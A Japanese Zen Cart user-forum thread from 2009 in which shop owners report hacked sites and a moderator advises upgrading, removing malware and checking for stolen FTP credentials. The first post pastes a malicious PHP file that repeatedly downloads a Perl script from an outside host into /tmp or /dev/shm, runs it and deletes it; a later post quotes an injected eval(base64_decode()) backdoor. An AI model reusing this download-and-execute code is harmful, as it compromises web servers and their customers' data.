やられた

上記のジャンルにあてはまらない話題、雑談など
アバター
keng

やられた

投稿記事by keng » 2009/10/12 10:44

はじめまして、初心者ですが、
zencartの管理画面にログインしたときに、
訪問者がいきなり多くなりまして、
しかもリンク先は見覚えのないPHPです。
内容は下記のようです。
これってハッカーの仕業?
また、 管理画面のディレクトリ名がデフォルトの admin を変更したいですが、どうすればよろしいですか?
どうぞよろしくお願い申し上げます。
??????????????????????????????
<?php @system("cd /tmp;wget http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @system("cd /tmp;fetch http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @system("cd /tmp;curl -O http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @shell_exec("cd /tmp;wget http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @shell_exec("cd /tmp;fetch http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @shell_exec("cd /tmp;curl -O http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @passthru("cd /tmp;wget http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @passthru("cd /tmp;fetch http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @passthru("cd /tmp;curl -O http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @exec("cd /tmp;wget http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @exec("cd /tmp;fetch http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @exec("cd /tmp;curl -O http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @system("cd /dev/shm/;wget http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @system("cd /dev/shm/;fetch http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @system("cd /dev/shm/;curl -O http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @shell_exec("cd /dev/shm/;wget http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @shell_exec("cd /dev/shm/;fetch http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @shell_exec("cd /dev/shm/;curl -O http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @passthru("cd /dev/shm/;wget http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @passthru("cd /dev/shm/;fetch http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @passthru("cd /dev/shm/;curl -O http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @exec("cd /dev/shm/;wget http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @exec("cd /dev/shm/;fetch http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); @exec("cd /dev/shm/;curl -O http://www.tank-treff.de/images/so.txt;perl so.txt;rm -rf so.txt*"); echo("e"."d"."u"."_"."l"."o"."c"."o"); ?>
???????????????????????
アバター
kimono
記事: 1995
登録日時: 2005/9/27 13:30
お住まい: 大阪府大阪市天王寺区上本町
連絡を取る:

Re: やられた

投稿記事by kimono » 2009/10/12 10:59

こんにちわ。kimonoです :)

それは、みんながやられて、一時騒いでいたハッキングと同じですね。
viewtopic.php?f=6&t=4609
viewtopic.php?f=7&t=4757
以前のスレッドを参照にして、最新版にバージョンアップして、ハッキングされたファイルの削除と、編集を行なってください。
アバター
funfun
記事: 14
登録日時: 2009/9/17 14:52

Re: やられた

投稿記事by funfun » 2009/10/19 01:31

はじめて投稿させていただきます。

Zen Cart 1.3.0.2-l10n-jp-5
MySQL 5.0.45
PHP バージョン: 5.1.6

上記環境で利用させていただいておりますが、本日の朝に
PHPを書き換えられてしまったようです。

書き換えられた場所は20?30箇所あると思います。
また新たなファイルも数箇所挿入されていました。

ファイルの書き換え内容はだいたい下記のような感じです。
ファイルの文頭に
<?php eval(base64_decode('aWYoIWlzc2V0KCR3....ここの部分はかなり長いですので省略.....FsnZSddKSk7')); ?><?php
/**
というものです。

新たなファイルというのはimgフォルダの中に入っていました。

一応書き換えられたファイルを再度アップして、新たなファイルは削除して現在は表示されていますが、私の対処方法では不安です。
何かまだ残っているものが悪さをはじめるのではないかと。。。

現状で確認をして置いた方が良いことと、セキュリティでできることがあれば、アドバイスをいただけませんでしょうか?

私には管理者とパスワードを変更する位しか手がありません。
最新のバージョンで安心をしておりましたが、こんなことになるとは思いませんでした。

予断ですが同じく本日の朝に、別サーバーでword pressで作成したHPのphpが書き換えられました。こちらはバージョンアップを怠っていました。ということで本日は散々な一日でした。

どうか皆様のお力添えをよろしくお願いいたします。
アバター
kimono
記事: 1995
登録日時: 2005/9/27 13:30
お住まい: 大阪府大阪市天王寺区上本町
連絡を取る:

Re: やられた

投稿記事by kimono » 2009/10/19 09:41

今回のハッキングはかなり多くのところがやられております。というか、バージョンが古いままのところはほとんどやられているのではないでしょうか?
対策としては、とにかく最新版にバージョンアップは必ず行なってください。これを行なわないと、またやられますw
そして、マルウェアを削除。書き換えられたファイルの修正ですね。

他の対策としては、ビッグマウスさんがまとめていましたように
http://www.zencart-pro.com/help/node/151
こんな方法がありますね。
アバター
funfun
記事: 14
登録日時: 2009/9/17 14:52

Re: やられた

投稿記事by funfun » 2009/10/19 10:18

kimono 様

アドバイスありがとうございました。
最新版のバージョンを使っていたので安心していましたが、
参考の対策用URLを読みましたところそれだけでは駄目みたいな感じですね。でも大変参考になりましたので私のサーバー環境と知識でできるところまでやってみます。

ところで昨晩、一度直ったように見えましたが、今朝またやられていました。かなりへこんでいます :cry:

管理者とパスワード、サーバーのパスワードとパーミッションを少し直したのですが、それだけでは駄目でした。

ちょっと恐怖症になっています。
アバター
kimono
記事: 1995
登録日時: 2005/9/27 13:30
お住まい: 大阪府大阪市天王寺区上本町
連絡を取る:

Re: やられた

投稿記事by kimono » 2009/10/19 10:23

通常は最新版にすれば、ハッキングは止まるはずですね。
今までの経験からしますと。ということは、まだ埋め込まれているマルウェアを削除できてないのかもしれないですね。
見たことがないファイルなどパーミッションで777などにしたフォルダの中など全て確認してみてください。
また、最新版ではきちんと、
admin/includes/auto_loaders/config.security_patch_v138_20090619.php
admin/includes/extra_configures/security_patch_v138_20090619.php
admin/includes/functions/extra_functions/security_patch_v138_20090619.php
admin/includes/functions/html_output.php
admin/includes/init_includes/init_security_patch_v138_20090619.php
これらのファイルが入っているかどうか確認してください。
アバター
funfun
記事: 14
登録日時: 2009/9/17 14:52

Re: やられた

投稿記事by funfun » 2009/10/19 11:26

お忙しいところ何度もありがとうございます。

書き方が悪かったと思いますが、最初から最新のバージョンを
入れています。バージョンアップしたのではないのです。

ご指摘のファイルは全て確認できました。

FFFTPで表示される時刻で書き換えられた、もしくは新たに入れられたと判断していたのですが、それ以外にもあるのかもしれません。
全部やり直そうかと考えましたが、それではまたやられた時には立ち直れないと思い、なんとかこのまま続けてみようと思います。

ちなみにphpファイルとjsファイルの通常のパーミッションは644でいいのでしょうか?どちらも書き換えられているんです :?:
アバター
kimono
記事: 1995
登録日時: 2005/9/27 13:30
お住まい: 大阪府大阪市天王寺区上本町
連絡を取る:

Re: やられた

投稿記事by kimono » 2009/10/19 11:31

ということは、最近のハッキングと違います。
最初からなっていたのであれば、同じ方法でやられた訳ではありませんので、別の方法でハッキングされております。
まずはその原因を追究しなければ、何度やっても同じことだと思います。
とりあえず、早急にサイトを閉じて、専門家の方などに、原因追求を頼んだ方がいいと思います。

ちなみに、先日、ftpのidとパスワードがのっとられて、サイトの書き換えをされていた方がいらっしゃいました。
これだと、いくら対策を行なっても、ftpがのっとらているので、いくらでも弄られたということです。
アバター
funfun
記事: 14
登録日時: 2009/9/17 14:52

Re: やられた

投稿記事by funfun » 2009/10/19 12:20

そうですか。
いろいろありがとうございました。

私の出来る範囲でないことはわかりました。

やっと完成したところだったのでとても残念ですが・・・。
アバター
kimono
記事: 1995
登録日時: 2005/9/27 13:30
お住まい: 大阪府大阪市天王寺区上本町
連絡を取る:

Re: やられた

投稿記事by kimono » 2009/10/19 12:38

できて、大変で、残念かもしれませんが、ネットショップの場合は、やはり個人情報も取り扱っておりますので、原因が分からない状態ではとても危険なことだと思います。
お客様の情報をdumpされて、個人情報を抜き取ったり、そのメールアドレスにウィルスや、スパムメールなどを大量に一斉配信されたり、そのサイトが危険な状態になり、訴えられることも考えられます。やはり運営者としては、そのようなことを知っていながら対策を行なわないということが、問題視されますので、ハッキングされたと分かっているということは、対策を打たなければなりません。
ちなみに、多くのサーバー会社は、ハッキングされたサイトは、停止されたり、アカウント停止になる模様です。

“Zen Cart 雑談処「禅亭」” へ戻る